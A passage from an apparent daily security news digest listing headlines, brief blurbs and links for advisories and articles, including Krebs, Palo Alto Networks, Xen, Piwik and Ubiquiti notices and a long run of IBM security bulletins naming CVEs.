http://feedproxy.google.com/~r/sucuri/blog/~3/NNlPrHaDARs/vbulletin-exploit…
*** TalkTalk, Script Kids & The Quest for "OG" ***
---------------------------------------------
So youve got two-step authentication set up to harden the security of your email account (you do, right?). But when was the last time you took a good look at the security of your inboxs recovery email address? That may well be the weakest link in your email security chain, as evidenced by the following tale of a IT professional who saw two of his linked email accounts recently hijacked in a bid to steal his Twitter identity.Earlier this week, I heard from Chris Blake, a longtime KrebsOnSecurity...
---------------------------------------------
http://feedproxy.google.com/~r/KrebsOnSecurity/~3/im8m6Imwfsk/
*** Connecting the Dots in Cyber Threat Campaigns, Part 2: Passive DNS ***
---------------------------------------------
This is the second part of our series on "connecting the dots", where we investigate ways to link attacks together to gain a better understanding of how they are related. In Part 1, we looked...
---------------------------------------------
http://feedproxy.google.com/~r/PaloAltoNetworks/~3/7x_ynKHJKns/
*** Xen Project 4.5.2 Maintenance Release Available ***
---------------------------------------------
I am pleased to announce the release of Xen 4.5.2. Xen Project Maintenance releases are released roughly every 4 months, in line with our Maintenance Release Policy. We recommend that all users of the 4.5 stable series update to this point release.
---------------------------------------------
https://blog.xenproject.org/2015/11/05/xen-project-4-5-2-maintenance-releas…
*** Open-Xchange Input Validation Flaw in Printing Dialogs Lets Remote Conduct Cross-Site Scripting Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1034018
*** Bugtraq: [KIS-2015-10] Piwik <= 2.14.3 (DisplayTopKeywords) PHP Object Injection Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/archive/1/536839
*** Bugtraq: [KIS-2015-09] Piwik <= 2.14.3 (viewDataTable) Autoloaded File Inclusion Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/archive/1/536838
*** MIT Kerberos Multiple Bugs Let Remote Users Cause the Target Service to Crash ***
---------------------------------------------
http://www.securitytracker.com/id/1034084
*** [2015-11-05] Insecure default configuration in Ubiquiti Networks products ***
---------------------------------------------
Ubiquiti Networks products have remote administration enabled by default (WAN port). Additionally these products use the same certificates and private keys for administration via HTTPS.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2015…
*** Citrix XenServer Multiple Security Updates ***
---------------------------------------------
A number of security vulnerabilities have been identified in Citrix XenServer that may allow a malicious administrator of a guest VM to compromise ...
---------------------------------------------
http://support.citrix.com/article/CTX202404
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: IBM WebSphere MQ is affected by multiple vulnerabilities in IBM Runtime Environments Java Technology Edition, Versions 5, 6 & 7 ***
http://www.ibm.com/support/docview.wss?uid=swg21968485
---------------------------------------------
*** IBM Security Bulletin: Apache Tomcat as used in IBM QRadar SIEM is vulnerable to Denial of Service Attack. (CVE-2014-0230) ***
http://www.ibm.com/support/docview.wss?uid=swg21970036
---------------------------------------------
*** IBM Security Bulletin: Openstack Nova vulnerability affects IBM Cloud Manager with OpenStack (CVE-2015-2687) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022691
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in OpenSSL affects IBM DB2 LUW (CVE-2015-0204) ***
http://www.ibm.com/support/docview.wss?uid=swg21968869
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities identified in IBM Java SDK affect WebSphere Service Registry and Repository Studio (CVE-2015-2613 CVE-2015-2601 CVE-2015-2625 CVE-2015-1931) ***
http://www.ibm.com/support/docview.wss?uid=swg21969911
---------------------------------------------
*** PowerHA SystemMirror privilege escalation vulnerability (CVE-2015-5005) ***
http://www.ibm.com/support/
---------------------------------------------
*** IBM Security Bulletin: IBM Maximo Asset Management could allow an authenticated user to change work orders that the user should not have access to change (CVE-2015-7395 ) ***
http://www.ibm.com/support/docview.wss?uid=swg21969072
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in the Linux Kernel affect PowerKVM ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022785
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in Python affect PowerKVM (CVE-2013-5123, CVE-2014-8991) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022786
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in OpenSLP affects PowerKVM (CVE-2015-5177) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022876
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Python-httplib2 affects PowerKVM (CVE-2013-2037) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022877
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in lcms affects PowerKVM (CVE-2015-4276) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022834
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Libcrypt++ affects PowerKVM (CVE-2015-2141) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022879
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in lighttpd affects PowerKVM (CVE-2015-3200) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022837
---------------------------------------------
*** IBM Security Bulletin:Vulnerabilities in wpa_supplicant may affect PowerKVM (CVE-2015-1863 and CVE-2015-4142) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022832
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in libXfont affect PowerKVM (CVE-2015-1802, CVE-2015-1803, CVE-2015-1804) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022787
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Mozilla NSS affects PowerKVM (CVE-2015-2730) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022790
---------------------------------------------
*** IBM Security Bulletin: Information disclosure vulnerability could expose user personal data in IBM WebSphere Commerce (CVE-2015-5015) ***
http://www.ibm.com/support/docview.wss?uid=swg21969174
---------------------------------------------
*** IBM Security Bulletin: IBM Flex System Manager is affected by a vulnerability from FSM's use of strongswan: (CVE-2015-4171) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022817
---------------------------------------------
*** IBM Security Bulletin: IBM Netezza Host Management is vulnerable to a BIND 9 utility issue (CVE-2015-5722) ***
http://www.ibm.com/support/docview.wss?uid=swg21966952
---------------------------------------------